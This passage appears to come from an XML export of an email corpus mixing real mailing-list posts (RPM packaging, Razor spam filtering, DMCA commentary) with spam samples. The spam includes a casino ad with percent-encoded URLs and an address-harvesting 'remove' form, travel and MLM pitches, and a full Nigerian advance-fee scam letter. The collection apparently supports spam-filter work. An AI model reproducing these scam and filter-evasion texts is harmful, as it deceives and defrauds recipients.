 alt=3D"Click Here To Collect Your $30 Dollars Free And Start Playing!" 
 src=3D"http://members.triposd.uk%81900955key=3D96589521081900955index=3DA2=
 1r7P6qW81900955.79048@%77%77%77.%70%72%65%73%74%69%67%6
 5%63%61%73%69%6e%6f.%63%6f%6d/%70ic/%70%72e%76ie%77%73/%62i%67/%62%6cac%6b=
 %6aac%6b.%6a%70%67" 
 border=3D0&gt;&lt;/A&gt;&lt;/P&gt;
 &lt;P align=3Dcenter&gt;&amp;nbsp;&lt;/P&gt;
 &lt;P align=3Dcenter&gt;&lt;FONT color=3D#ffffff size=3D5&gt;To Collect Your $30 Cash =
 &lt;/FONT&gt;&lt;A 
 href=3D"http://www.cyberxcasino.com"&gt;&lt;FONT 
 size=3D5&gt;Click Here!&lt;/FONT&gt;&lt;/A&gt;&lt;/P&gt;
 &lt;P align=3Dcenter&gt;&amp;nbsp;&lt;/P&gt;
 &lt;P align=3Dcenter&gt;&lt;A 
 href=3D"http://www.cyberxcasino.com"&gt;&lt;IMG 
 alt=3D"Click Here To Collect Your $30 Dollars Free And Start Playing!" 
 src=3D"http://members.triposd.uk%21362822key=3D96589521021362822index=3DA2=
 1r7P6qW21362822.4140327@%77%77%77.%70%72%65%73%74%69%67
 %65%63%61%73%69%6e%6f.%63%6f%6d/%70ic/a%77a%72%64%73/%67om%5f%74o%70ca%73i=
 %6eo%5f%64a%72%6b%31.%67i%66" 
 border=3D0&gt;&lt;/A&gt;&lt;/P&gt;
 &lt;P align=3Dcenter&gt;&amp;nbsp;&lt;/P&gt;
 &lt;P align=3Dcenter&gt;&amp;nbsp;&lt;/P&gt;
 &lt;P align=3Dcenter&gt;&amp;nbsp;&lt;/P&gt;
 &lt;P&gt;
 &lt;form name=3D"form" method=3D"post" action=3D"http://81.9.8.41/r/process_c=
 leanlist.php"&gt;
 &lt;DIV align=3Dcenter&gt; 
             &lt;table width=3D"391" border=3D"1" cellspacing=3D"0" cellpaddin=
 g=3D"0" align=3D"center" bordercolor=3D"#000000"&gt;
               &lt;tr&gt; 
                 &lt;td&gt; 
                   &lt;table width=3D"400" border=3D"0" cellspacing=3D"0" cell=
 padding=3D"2" bgcolor=3D"#cccccc"&gt;
                     &lt;tr&gt; 
                       &lt;td&gt;
             &lt;P&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" size=3D"2"&gt;This=
  message is sent in compliance of the new 
             e-mail bill:&lt;BR&gt;SECTION 301 Per Section 301, Paragraph (a)(2)(=
 C) of 
             S. 1618,&lt;BR&gt;Further transmissions to you by the sender of this=
  email 
             maybe&lt;BR&gt;stopped at no cost to you by entering your email addr=
 ess 
             to&lt;BR&gt;the form in this email and clicking submit to be 
             automatically&lt;BR&gt;   
                                removed. &lt;/font&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" size=3D2&gt;To be Removed f=
 rom our 
             Opt-In mailing list. Please enter your email address in the pr=
 ovided 
             box below and click remove, thank you. 
       &lt;/FONT&gt;&lt;/P&gt;&lt;/td&gt;
                     &lt;/tr&gt;
                   &lt;/table&gt;
                   &lt;table width=3D"400" border=3D"0" cellspacing=3D"0" cell=
 padding=3D"0" bgcolor=3D"#cccccc"&gt;
                     &lt;tr&gt; 
                       &lt;td&gt; 
                         &lt;div align=3D"center"&gt; 
                           &lt;input type=3D"hidden" name=3D"subject" value=3D=
 "REMOVE"&gt;
                           &lt;input name=3D"email" size=3D"30" 
            &gt;
                           &lt;input type=3D"submit" name=3D"Submit" value=3D"=
 REMOVE"&gt;
                         &lt;/div&gt;
                       &lt;/td&gt;
                     &lt;/tr&gt;
                   &lt;/table&gt;
                   &lt;div align=3D"center"&gt;&lt;/div&gt;
                   &lt;div align=3D"center"&gt;&lt;/div&gt;
                   &lt;table width=3D"400" border=3D"0" cellspacing=3D"0" cell=
 padding=3D"0" bgcolor=3D"#cccccc"&gt;
                     &lt;tr&gt; 
                       &lt;td&gt; 
                         &lt;div align=3D"center"&gt;&lt;font face=3D"Arial, Helveti=
 ca, sans-serif" size=3D"1"&gt;Your 
                           E-mail Address Will Be Immediately Removed From =
 All Mailing Lists&lt;/font&gt;&lt;/div&gt;
                       &lt;/td&gt;
                     &lt;/tr&gt;
                   &lt;/table&gt;
                 &lt;/td&gt;
               &lt;/tr&gt;
             &lt;/table&gt;&lt;/DIV&gt;
         &lt;/form&gt;
 &lt;P&gt;&amp;nbsp;&lt;/P&gt;
 &lt;/P&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: And yet more absurdity.
</t>
  </si>
  <si>
    <t xml:space="preserve">I knew it'd be a day for insanity.
 so anyway, news.com decided to write up two wonderful articles on the
 DMCA and decided to link to decss.exe, the very verboten code that
 ended up getting 2600 (but none of the other news services that
 originally linked) spanked.
 Slashdot, of course, links to them.
 So now, I link to slashdot.
 http://slashdot.org/articles/02/10/07/1331217.shtml?tid=123
 I find this all incredibly funny really.  Congress _and_ the courts
 relaly do need to be considering how laws such as the DMCA are
 applied.  For the most part, these rules are coming down to whose
 friend you happen to be, how nefarious the defendant party is, and how
 asleep the judge is behind the case (asleep/self-interested/bought).
 Its giving me a real cynical view on being a lawyer, thats for sure.
 -- 
 Best regards,
  bitbitch                          mailto:bitbitch@magnesium.net
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RE: Microsoft buys XDegress - more of a p2p/distributed data thing...
</t>
  </si>
  <si>
    <t xml:space="preserve">XDegrees was at the WebDAV Interoperability Testing Event last year, so
 there may be some DAV under the hood there someplace.
 - Jim
 &gt; -----Original Message-----
 &gt; From: fork-admin@xent.com [mailto:fork-admin@xent.com]On Behalf Of
 &gt; Gordon Mohr
 &gt; Sent: Wednesday, September 11, 2002 12:00 AM
 &gt; To: fork@example.com
 &gt; Subject: Re: Microsoft buys XDegress - more of a p2p/distributed data
 &gt; thing...
 &gt;
 &gt;
 &gt; Mr. FoRK writes:
 &gt; &gt; "Files can be cached on multiple systems randomly scattered around the
 &gt; &gt; Internet, as with Napster or Freenet. In fact, the caching in
 &gt; XDegrees is
 &gt; &gt; more sophisticated than it is on those systems: users with high
 &gt; bandwidth
 &gt; &gt; connections can download portions, or "stripes," of a file from several
 &gt; &gt; cached locations simultaneously. The XDegrees software then reassembles
 &gt; &gt; these stripes into the whole file and uses digital signatures
 &gt; to verify that
 &gt; &gt; the downloaded file is the same as the original. A key component of this
 &gt; &gt; digital signature is a digest of the file, which is stored as
 &gt; an HTTP header
 &gt; &gt; for the file."
 &gt;
 &gt; This "more sophisticated than [Napster or Freenet]" part seems
 &gt; to be the same behavior implemented in many other P2P CDNs,
 &gt; such as:
 &gt;
 &gt;   - Kazaa
 &gt;   - EDonkey/Overnet
 &gt;   - BitTorrent
 &gt;   - Gnutella (with HUGE extensions)
 &gt;   - OnionNetworks WebRAID
 &gt;
 &gt; ...though the quality of the "digest" used by each system varies
 &gt; wildly.
 &gt;
 &gt; - Gordon
 &gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Congrats!  Here are your 2 Free Airline Tickets
</t>
  </si>
  <si>
    <t xml:space="preserve">--##########
 See below for your Exit Information.
 ============================================================================================================
 2 FREE Round-Trip Air Tickets! USA, Caribbean, Hawaii, Mexico! 
 1,000 Complimentary Long Distance Calling Minutes 
 To get this incredible TALK &amp; TRAVEL offer NOW, click on the 
 link below or paste it into your browser: 
 http://results.reliatrack.com/select.php?pos=9900027056&amp;active=1783816 
 Imagine jetting off to exciting destinations in California, 
 Florida, the Caribbean, Hawaii or Mexico, ABSOLUTELY FREE! 
 Then, imagine spending 1,000 minutes on the phone with friends 
 and family, ABSOLUTELY FREE! To top it all off, imagine 
 enjoying low, low long distance rates - anytime, anywhere! 
 ACT NOW! This is a LIMITED TIME OFFER, click on the link below 
 or paste it into your browser: 
 http://results.reliatrack.com/select.php?pos=9900027056&amp;active=1783816 
 This is a totally risk-free, 100% satisfaction-guaranteed offer. 
 You get FREE TRAVEL, COMPLIMENTARY LONG DISTANCE MINUTES, plus 
 the LONG DISTANCE RATES. Your 2 FREE ROUND-TRIP AIR TICKETS are 
 yours to keep and good for one full year! 
 2 FREE ROUND-TRIP AIR TICKETS 1,000 COMPLIMENTARY CALLING 
 MINUTES LOW, LOW LONG DISTANCE RATES 
 Click on the link below or paste it into your browser: 
 http://results.reliatrack.com/select.php?pos=9900027056&amp;active=1783816
 ============================================================================================================
 Your email address has been submitted to The PermissionPass Network for mailing by one of our merchant clients, or included as part of an assets purchase.  You may permanently remove yourself at http://www.permissionpass.com/optout.php?email=jm@netnoteinc.com
 &amp;pos=9900027056.  Thank you..
 - Reservation Desk
 --##########
 Content-Type: text/html
 Content-Transfer-Encoding: 7bit
 Content-Disposition: inline
 &lt;table&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;font face="arial" size="1"&gt;&lt;u&gt;See below for your Exit Information.&lt;/U&gt;&lt;/FONT&gt;&lt;/TD&gt;
 &lt;/TR&gt;&lt;/TD&gt;
 &lt;tr&gt;&lt;td&gt;&lt;img src="http://results.reliatrack.com/active.php?xactive=9900027056&amp;yactive=http://results.reliatrack.com/active.gif" height="1" width="1"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/TABLE&gt;
 &lt;html&gt; 
 &lt;head&gt; 
 &lt;title&gt;2 FREE Airline Tickets!&lt;/title&gt; 
 &lt;meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"&gt; 
 &lt;/head&gt; 
 &lt;body bgcolor="#FFFFFF" text="#000000"&gt; 
 &lt;table width="193" border="0" cellspacing="0" cellpadding="0"&gt; 
 &lt;tr&gt; 
 &lt;td&gt;&lt;a href="http://results.reliatrack.com/select.php?pos=9900027056&amp;active=1783816"&gt;&lt;img src="http://www.save4less.com/creative/s4l_2agraph/s4l1.gif" width="243" height="201" border="0"&gt;&lt;/a&gt;&lt;a href="http://results.reliatrack.com/select.php?pos=9900027056&amp;active=1783816"&gt;&lt;img src="http://www.save4less.com/creative/s4l_2agraph/s4l2.gif" width="169" height="201" border="0"&gt;&lt;/a&gt;&lt;a href="http://results.reliatrack.com/select.php?pos=9900027056&amp;active=1783816"&gt;&lt;img src="http://www.save4less.com/creative/s4l_2agraph/s4l3.gif" width="236" height="201" border="0"&gt;&lt;/a&gt;&lt;/td&gt; 
 &lt;/tr&gt; 
 &lt;tr&gt; 
 &lt;td&gt;&lt;a href="http://results.reliatrack.com/select.php?pos=9900027056&amp;active=1783816"&gt;&lt;img src="http://www.save4less.com/creative/s4l_2agraph/s4l4.gif" width="243" height="154" border="0"&gt;&lt;/a&gt;&lt;a href="http://results.reliatrack.com/select.php?pos=9900027056&amp;active=1783816"&gt;&lt;img src="http://www.save4less.com/creative/s4l_2agraph/s4l5.gif" width="169" height="154" border="0"&gt;&lt;/a&gt;&lt;a href="http://results.reliatrack.com/select.php?pos=9900027056&amp;active=1783816"&gt;&lt;img src="http://www.save4less.com/creative/s4l_2agraph/s4l6.gif" width="236" height="154" border="0"&gt;&lt;/a&gt;&lt;/td&gt; 
 &lt;/tr&gt; 
 &lt;tr&gt; 
 &lt;td&gt; 
 &lt;div align="left"&gt;&lt;font size="4" face="Arial, Helvetica, sans-serif"&gt;&lt;b&gt;&lt;a href="http://results.reliatrack.com/select.php?pos=9900027056&amp;active=1783816"&gt;&lt;img src="http://www.save4less.com/creative/s4l_2agraph/animation.gif" width="648" height="85" border="0"&gt;&lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;/div&gt; 
 &lt;/td&gt; 
 &lt;/tr&gt; 
 &lt;/table&gt; 
 &lt;p&gt; &lt;/p&gt; 
 &lt;/body&gt; 
 &lt;/html&gt;&lt;!----&gt;&lt;table&gt;
 &lt;tr&gt;
 &lt;!--9900027056/6--&gt;
 &lt;td&gt;&lt;font color="black" face="arial" size="1"&gt;
 Your email address has been submitted to The PermissionPass Network for mailing by one of our merchant clients, or included as part of an assets purchase.  You may permanently remove yourself by clicking &lt;a href="http://www.permissionpass.com/optout.php?email=jm@netnoteinc.com
 &amp;pos=9900027056"&gt;HERE&lt;/a&gt;.  Thank you.
 &lt;/FONT&gt;&lt;/TD&gt;
 &lt;/TR&gt;
 &lt;/TABLE&gt;
 --##########--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: GET IN AT THE TOP!
</t>
  </si>
  <si>
    <t xml:space="preserve">DON'T MISS OUT ON AN AMAZING BUSINESS OPPORTUNITY AND WEIGHT LOSS PRODUCT! 
 PLEASE VISIT www.good4u.autodreamteam.com
 THERE IS NO OBLIGATION 
 AND IT'S WORTH A LOOK!
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RPM / hardware device / software packages ?
</t>
  </si>
  <si>
    <t xml:space="preserve">I am new to linux.
 Is that an easy way to identify which rpm / rpms to which hardware
 devices or software packages?
 Regards,
     Yen Ho
 (Technical Support)
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Reuters: "Pets may not only provide good company for their
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://scriptingnews.userland.com/backissues/2002/09/25#When:8:14:00AM
 Date: Wed, 25 Sep 2002 15:14:00 GMT
 Reuters[1]: "Pets may not only provide good company for their owners, they may 
 also help lower stress, according to new study findings."
 [1] http://abcnews.go.com/wire/Living/reuters20020924_315.html
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,
 We were rolling out changes to TeS and catalogue servers over the last two
 days. Any glitches you might have experienced would have been due to the
 upgrades. The upgrades are now complete, and things are back to normal.
 Several new features in TeS will provide better accuracy, specially with
 regards to false-positives.
 cheers,
 vipul.
 On Tue, Aug 06, 2002 at 06:54:04PM -0400, Rose, Bobby wrote:
 &gt; I'm still seeing this.  It reports to honor.cloudmark.com but checks
 &gt; against apt.cloudmark.com.  What is the sync delay between these boxes?
 &gt; 
 &gt; -----Original Message-----
 &gt; From: Rose, Bobby 
 &gt; Sent: Monday, August 05, 2002 2:05 PM
 &gt; To: ML-razor-users
 &gt; Subject: [Razor-users] What's wrong with the Razor servers now?
 &gt; 
 &gt; 
 &gt; I noticed a low count of razor'd spam messages. So after digging, if I
 &gt; razor-report a message the diags say that it was accepted but if I turn
 &gt; around and run a check on the exact same message that was reported, then
 &gt; it doesn't find the sig and as such isn't spam.
 &gt; 
 &gt; 
 &gt; -------------------------------------------------------
 &gt; This sf.net email is sponsored by:ThinkGeek
 &gt; Welcome to geek heaven.
 &gt; http://thinkgeek.com/sf _______________________________________________
 &gt; Razor-users mailing list
 &gt; Razor-users@lists.sourceforge.net
 &gt; https://lists.sourceforge.net/lists/listinfo/razor-users
 &gt; 
 &gt; 
 &gt; -------------------------------------------------------
 &gt; This sf.net email is sponsored by:ThinkGeek
 &gt; Welcome to geek heaven.
 &gt; http://thinkgeek.com/sf
 &gt; _______________________________________________
 &gt; Razor-users mailing list
 &gt; Razor-users@lists.sourceforge.net
 &gt; https://lists.sourceforge.net/lists/listinfo/razor-users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</si>
  <si>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Subject: when building a rpm i386-redhat-linux- is appended to man page
</t>
  </si>
  <si>
    <t xml:space="preserve">
 --Fig2xvG2VGoz8o/s
 Content-Type: text/plain; charset=us-ascii
 Content-Disposition: inline
 Hi,
 When I do a
 rpm -ta on the package (pam_ssh), in the %makeinstall phase, I get
 /usr/bin/install -c -m 644 ./pam_ssh.8 /var/tmp/pam_ssh-root/usr/share/man/man8/i386-redhat-linux-pam_ssh.8
 instead of what would have been right:
 /usr/bin/install -c -m 644 ./pam_ssh.8 /var/tmp/pam_ssh-root/usr/share/man/man8/pam_ssh.8
 With a plain  ./configure; make; make install I get the right
 /usr/bin/install -c -m 644 ./pam_ssh.8 /usr/local/man/man8/pam_ssh.8
 Is it something normal ? Could you please help me to get this right ?
 I join the Makefile.am and the spec file.
 Pat
 --Fig2xvG2VGoz8o/s
 Content-Type: text/plain; charset=us-ascii
 Content-Disposition: attachment; filename="Makefile.am"
 # $Id: Makefile.am,v 1.6 2002/08/09 18:33:24 akorty Exp $
 lib_LTLIBRARIES		= libpam_ssh.la
 libpam_ssh_la_LIBADD	= @LTLIBOBJS@
 libpam_ssh_la_SOURCES	= atomicio.c atomicio.h authfd.c authfd.h \
 			  authfile.c authfile.h bufaux.c bufaux.h \
 			  buffer.c buffer.h cipher.c cipher.h getput.h \
 			  kex.h key.c key.h log.c log.h pam_mod_misc.h \
 			  pam_ssh.c pam_ssh.h rijndael.c rijndael.h \
 			  xmalloc.c xmalloc.h openpam_cred.h
 man_MANS		= pam_ssh.8
 securitydir		= @PAMDIR@
 AUTOMAKE_OPTIONS	= dist-bzip2
 EXTRA_DIST		= $(man_MANS) pam_ssh.spec
 libtool: $(LIBTOOL_DEPS)
 	$(SHELL) ./config.status --recheck
 install-libLTLIBRARIES: $(lib_LTLIBRARIES)
 	@$(NORMAL_INSTALL)
 	$(mkinstalldirs) $(DESTDIR)$(securitydir)
 	$(INSTALL_DATA) .libs/libpam_ssh.so \
 	    $(DESTDIR)$(securitydir)/pam_ssh.so
 --Fig2xvG2VGoz8o/s
 Content-Type: text/plain; charset=us-ascii
 Content-Disposition: attachment; filename="pam_ssh.spec"
 Summary: pam_ssh package
 Name: pam_ssh
 Version: 1.7
 Release: 1
 URL: http://sourceforge.net/projects/pam-ssh/
 Source0: %{name}-%{version}.tar.gz
 License: BSD
 BuildRoot: %{_tmppath}/%{name}-root
 Requires: pam, openssh, openssh-clients
 BuildRequires: pam-devel
 Group: System Environment/Base
 %description
 This PAM module provides single sign-on behavior for UNIX using SSH. Users
 are authenticated by decrypting their SSH private keys with the password
 provided (probably to XDM). In the PAM session phase, an ssh-agent process is
 started and keys are added.
 %prep
 %setup -q
 %build
 %configure
 make clean
 make
 %install
 rm -rf $RPM_BUILD_ROOT
 %makeinstall securitydir=$RPM_BUILD_ROOT/lib/security
 %clean
 rm -rf $RPM_BUILD_ROOT
 %files
 %defattr(-,root,root)
 /lib/security/pam_ssh.so
 %{_mandir}/*/pam_ssh*
 %changelog
 * Fri Aug 16 2002 Dumas Patrice &lt;dumas@centre-cired.fr&gt;
 - Initial build.
 --Fig2xvG2VGoz8o/s--
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Was child beating mom an enraged con artist?
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85483138
 Date: Not supplied
 Article about a scam expert who belives the mom who beat her child is a grifter 
 belonging to the Irish Travelers. The reason she beat up her little girl, he 
 thinks, is becasue she was pissed that the kid blew her con at a toy store. 
     Wright believes the beating happened for one of two reasons. "The little 
     girl gave away the scam to an employee or the mom was so ticked off at not 
     getting refunds she took it out on the little girl." 
 I don't know anything about the Irish Travelers, but I'm wondering if they are 
 getting a bad rap about being con-artists. This Irish Traveler FAQ[1] says 
 "some Travellers are con men, but, just like other Americans, most are not." 
 Link[2] Discuss[3]
 [1] http://www.pitt.edu/~alkst3/USA.html
 [2] http://www.wndu.com/news/contact16/contact16_2450.php
 [3] http://www.quicktopic.com/16/H/umA3qpRqVJkRm
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Economist: Internet models, viral spread, social diseases
</t>
  </si>
  <si>
    <t xml:space="preserve">Not exactly new bits, but I enjoyed seeing The Economist
 pick up on the similarity between computer and social
 networks:
 http://www.economist.com/science/displayStory.cfm?story_id=1365118
 _________________________________________________________________
 Chat with friends online, try MSN Messenger: http://messenger.msn.com
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Spam nostalgia, Annoyance Calls, good ideas with no analysis
</t>
  </si>
  <si>
    <t xml:space="preserve">Am I going to long for the good old days of Nigerian 419?
 After picking up the land-line phone mid-day (always a bad idea) only to 
 slam it down before the telemarketer even spoke, I have in mind an 
 invention.  If my brain can detect the crosstalk from a call-center before 
 the human, sub-human, or machine starts speaking, why not have a box that 
 just hangs up for me?  Maybe it could blow a police whistle (play a 
 sample) into the phone first.
 Currently, a strategy of leaving the machine on as a screener works pretty 
 well, but I still get Carey-on-RIAA style mad when the damn phone rings 
 and it's NOT anyone I want to talk to.
 .....
 I want to like Spider Robinson's works.  Really.  I mean having a "Bridge 
 of Birds" attraction in the "China that never was" portion of the theme 
 part in "The Free Lunch...."   But, I really fell for his anti-paparatzi 
 device (invented by a princess Diana fan).   Doggone.  I've now completely 
 reasoned my way around it.  It has a built-in defense against the first 
 obvious way of confounding it, but that leads directly to an exploit that 
 uses off the shelf hardware that a paparatzi ought to have in her kit.
 That's so often the problem with Robinson.  He doesn't think that you the 
 reader are nearly so smart as he.  Heh.   I admit that reading a lot of 
 slushpile manuscripts does not improve one's opinion of fellow-man, but
 I always resent him for not being thorough.
 Eirikur
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">On Mon, 9 Sep 2002, Lucas Gonze wrote:
 &gt; a linearly greater number of sexual partners on the order of 1.5-2X.  But
 &gt; then again, it not a monolithic or homogeneous community.  Who knows?
 Did I claim "all gay people are hyperpromiscuous"? For what this is worth,
 I would claim they're considerably more promiscuous on the average than
 your average het. My utterly unscientific, unsubstatiated claim is that
 the typical male would *like* to be considerably more promiscous than your
 average female (ay, and here's the rub. pray don't forget the kleenex).  
 Look up different reproduction strategies, due to basic hardware
 difference (sexual dimorphism). You'd do that too if it happened to you.
 Once you go past the first three of four pages of hysterical propaganda on
 Google you might actually run into real studies. Anyone game? I have to 
 work (well, pretend to).
 &gt; 3K is utter shite.
 This is getting better and better. You know 3K is utter shite how? You
 just feel the number can't be right, yes? Deep inside? I'm way overposting
 today, but I find this entire exchange hee-lay-rious. 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [Razor-users] Razor and Pine
</t>
  </si>
  <si>
    <t xml:space="preserve">I've been testing Razor, invoked from sendmail/procmail and so far it
 seems pretty copacetic. Last night's spam to the list provided a good test
 - the spam itself as well as several of the responses were flagged, as
 other list members reported.
 This morning I piped the messages out from pine, being careful to use the
 RAW mode, to razor-check -d. None of the messages come back as spam, even
 the spam. Since folks revoked the false positives, I understand why they
 would not come up, but not the spam itself, unless that also was revoked.
 Is this spam just a bad one to test against, or is there some setting in
 pine or razor that I am missing?
 -- 
 sc
 -------------------------------------------------------
 This sf.net email is sponsored by:ThinkGeek
 Welcome to geek heaven.
 http://thinkgeek.com/sf
 _______________________________________________
 Razor-users mailing list
 Razor-users@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG-Social] HELLO
</t>
  </si>
  <si>
    <t xml:space="preserve">OFFICE OF:EGNR. FEMI DANIEL
 FEDERAL MINISTRY OF WORKS AND HOUSING
 FEDERAL SECRETARIAT OFFICE COMPLEX
 IKOYI-LAGOS.
 ATTN:,                  
 First, I must solicit your strictest confidence in this transaction, this is by virtue of its nature as being utterly confidential and top secret as you were introduced to me in confidence through the Nigeria Chamber of Commerce and Industries.
 We are top officials from the Federal Ministry of Works and Housing,(FMW&amp;H), Federal Ministry of Finance and the Presidency, making up the Contract Review Panel(CRP) set up by the Federal Government of Nigeria to review contracts awarded by the past military administration. 
 In the course of our work on the CRP, we discovered this fund which resulted from grossly over - invoiced contracts which were executed for the FMW&amp;H during the last administration.The companies that executed the contracts have been duly paid and the contracts commissioned leaving the sum of US$21.4 Million floating in the escrow account of the Central Bank of Nigeria ready for payment.
 I have therefore  been mandated as a matter of trust by my colleagues in the panel to look for an overseas partner to whom we could transfer the sum of US21.4 legally subcontracting the entitlement to your company.This is bearing in mind that our civil service code of conduct forbids us from owning foreign companies or operating foreign accounts while in government service, hence the need for an overseas partner.
 We have agreed that the funds will be shared thus after it has been paid into your account.
 (1) 30% of the money will go to you for acting as the beneficiary of the fund.
 (2) 10% has been set aside as an abstract projection for reimbursement to both parties for incidental expences that may be incurred in the course of the transaction.
 (3) 60% to us the government officials (with which we intend to commence an importation business in conjunction with you)
 All logistics are in place and all modalities worked out for the smooth conclusion of the transaction within ten to fourteen days of commencement after receipt of the following information; your full names, company's name, address,details &amp; activities, telephone &amp; fax numbers.These information will enable us make the applications and lodge claims to the concerned ministries &amp; agencies in favour of your company and it is pertinent to state here that this transaction is entirely based on trust as the solar bank draft or certified cheque drawable in any of the Central Bank of Nigeria correspondent bankers around the world is going to be made in your name.
 Please acknowledge the reciept of this letter using the above e-mail or the Alternative: femi1855@aol.com to reply me. 
 Yours faithfully,
 Egnr. Femi Daniel.
 NB:Bank Account Details not necessary as preferred mode of payment is by draft or cheque. 
 -- 
 Irish Linux Users' Group Social Events: social@linux.ie
 http://www.linux.ie/mailman/listinfo/social for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &gt; *  Too much information?
 The saying, as I recall, is along
 the lines of "put your best foot
 forward".
 (In this case, you seem to have put
 everything forward, in a Fosbury
 Flop consisting of the best foot,
 the worst foot, enough arms for a
 diety and his consort, and even a
 set of spare limbs from Hoffa or
 the space aliens or whatever it is
 you keep locked up in the trunk of
 the Bonneville)
 &gt;           ... replied ... in one go, in a matter of minutes. I *do*
 &gt; really think this way, complete with footnotes. So if it's too much
 &gt; information, I still stand by my reply: I wouldn't be myself if I
 &gt; started off playing games.
 Pascal could write short letters,
 when he had the time.  Is editing
 to provide an "executive summary"
 really being untrue to yourself?
 (We are all used to a full-bore
 real-time Rohit streaming, but
 that's because we are already
 "Friends of", and know to set
 our buffers accordingly.  For a
 stranger's sake, it may be best
 to provide the "elevator pitch
 Rohit" -- and negotiate upwards
 only after a session has been
 established)
 -Dave
 :::::
 Thomas Jefferson writes:
 &gt; I served with General Washington in the legislature of Virginia before
 &gt; the revolution and during it with Dr. Franklin in Congress. I never
 &gt; heard either of them speak [for as long as] ten minutes at a time ...
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: September Core Java Technologies Newsletter
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"&gt;
 &lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;Core Java Technologies Newsletter&lt;/title&gt;
 &lt;style type="text/css"&gt;
 CODE {color: #333333; font-family: Verdana, Courier, Monospace; font-size: 10pt}
 PRE {color: #333333; font-family: Verdana, Courier, Monospace; font-size: 10pt}
 BODY, div, span {color: #333333; font-family: Arial, Helvetica, sans-serif; font-size: 10pt}
 td, th {color: #333333; font-family: Arial, Helvetica, sans-serif; font-size: 10pt}
 tr {color: #333333; font-family: Arial, Helvetica, sans-serif; font-size: 10pt}
 table {font-family: Arial, Helvetica, sans-serif; font-size: 10pt}
 p {color: #333333; font-family: arial,helvetica,sans-serif; font-size: 10pt}
 li {color: #333333; font-family: Arial, Helvetica, sans-serif; font-size: 10pt}
 br {color: #333333; font-family: Arial, Helvetica, sans-serif; font-size: 10pt}
 div {color: #666699; font-family: Arial, Helvetica, sans-serif; font-size: 10pt}
 sup {color: #333333; font-family: Arial, Helvetica, sans-serif; font-size: 5pt}
 h3 {color: #666699; font-family: Arial, Helvetica, sans-serif; font-size: 11pt}
 h4, h5, h6 {color: #333333; font-family: Arial, Helvetica, sans-serif; font-size: 10pt}
 blockquote, input, select {color: #333333; font-family: Arial, Helvetica, sans-serif; font-size: 
 10pt}
 ul, ol, font {color: #333333; font-family: Arial, Helvetica, sans-serif; font-size: 10pt}
 a:link {font-size: 10pt; font-family: Arial, Helvetica, sans-serif; color:#666699 }
 span.small {font-size: 8pt; font-family: Arial, Helvetica, sans-serif; color:#333333 }
 span.link {font-size: 8pt; font-family: Arial, Helvetica, sans-serif; color:#666699 }
 &lt;/style&gt;
 &lt;/head&gt;
 &lt;body&gt;
 &lt;table bgcolor="#666699" width="613" cellspacing="0" cellpadding="1" border="0"&gt;
 &lt;tr&gt;
 &lt;!-- BEGIN WRAPPER --&gt;
 &lt;td&gt;
 &lt;table bgcolor="#ffffff" width="611" cellspacing="0" cellpadding="0" border="0"&gt;
 &lt;tr&gt;
 &lt;td bgcolor="#ffffff" colspan="7"&gt;
 &lt;a href="http://developer.java.sun.com?s=04&amp;w=37"&gt;&lt;img 
 src="http://developer.java.sun.com/images/headers/core_news_hdr.jpg" width="611" height="160" 
 border="0" alt="header"&gt;&lt;/a&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td bgcolor="#ffffff" width="10"&gt;&lt;img src="http://developer.java.sun.com/images/pixel.gif" 
 width="10" height="1" alt=""&gt;&lt;/td&gt;
 &lt;!-- BEGIN LEFT COLUMN --&gt;
 &lt;td valign="top" bgcolor="#ffffff" width="175"&gt;
 &lt;table width="100%" border="0" cellpadding="0" cellspacing="0"&gt;
 &lt;tr valign="top"&gt;
 &lt;td&gt;
 &lt;br&gt;&lt;br&gt;
 Welcome to the new Core Java&lt;sup&gt;TM&lt;/sup&gt; Technologies Newsletter (formerly, the JDC Newsletter). 
 Here you'll find links to the latest products, tools, resources, and events relating to development 
 with the Java&lt;sup&gt;TM&lt;/sup&gt; 2 Platform, Standard Edition (J2SE&lt;sup&gt;TM&lt;/sup&gt;).
 &lt;br&gt;&lt;br&gt;
 &lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;hr noshade color="#666699"&gt;
 &lt;table width="100%" border="0" cellpadding="0" cellspacing="0"&gt;
 &lt;tr valign="top"&gt;
 &lt;td&gt;
 &lt;p&gt;
 &lt;h3&gt;Special Announcement:&lt;/h3&gt; Special SunNetwork&lt;sup&gt;SM&lt;/sup&gt; Conference Discount for Developers. 
